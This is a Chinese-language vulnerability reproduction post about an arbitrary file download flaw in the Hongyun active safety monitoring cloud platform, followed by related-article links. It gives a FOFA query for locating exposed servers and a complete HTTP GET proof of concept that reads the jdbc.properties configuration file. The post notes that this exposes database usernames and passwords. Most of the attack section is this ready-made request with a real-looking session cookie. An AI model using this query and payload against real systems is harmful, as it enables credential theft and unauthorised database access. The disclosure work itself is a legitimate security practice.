鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]

文章目录

  • [鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]](#鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC])
    • [0x01 前言](#0x01 前言)
    • [0x02 漏洞描述](#0x02 漏洞描述)
    • [0x03 影响版本](#0x03 影响版本)
    • [0x04 漏洞环境](#0x04 漏洞环境)
    • [0x05 漏洞复现](#0x05 漏洞复现)

鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

0x03 影响版本

复制代码
鸿运主动安全监控云平台

0x04 漏洞环境

FOFA语法:body="./open/webApi.html"

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC (GET)

bash 复制代码
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zh; style=1; maintitle=%u5317%u6597%u89C6%u9891%u8FD0%u8425%u5E73%u53F0; JSESSIONID=1B2F4E6550CE07CBA9EBE5533B00AE05
Connection: close

3.复现

可以发现数据的账户以及密码,可以进行登录连接数据库。

相关推荐
深盾安全9 分钟前
Python脚本安全防护策略全解析(下)
安全
叫我阿柒啊33 分钟前
自学渗透,学会五分钟安装DVWA漏洞靶场
后端·安全
小云数据库服务专线9 小时前
GaussDB 数据库架构师修炼(十三)安全管理(5)-动态数据脱敏
安全·数据库架构·gaussdb
lingggggaaaa10 小时前
小迪安全v2023学习笔记(六十二讲)—— PHP框架反序列化
笔记·学习·安全·web安全·网络安全·php·反序列化
Johny_Zhao11 小时前
基于 Docker 的 LLaMA-Factory 全流程部署指南
linux·网络·网络安全·信息安全·kubernetes·云计算·containerd·yum源·系统运维·llama-factory
黑客影儿13 小时前
Kali Linux 环境中的系统配置文件与用户配置文件大全
linux·运维·程序人生·安全·网络安全·系统安全·学习方法
三年呀16 小时前
标题:移动端安全加固:发散创新,筑牢安全防线引言:随着移动互联网
网络·python·安全
小韩博19 小时前
网络安全(Java语言)脚本 汇总(二)
java·安全·web安全
小张的博客之旅19 小时前
宁波市第八届网络安全大赛初赛(REVERSE-Writeup)
学习·网络安全·reverse
网络研究院1 天前
网络安全和基础设施安全局 (CISA) 表示微分段不再是可选的
网络·安全·web安全·零信任·微分段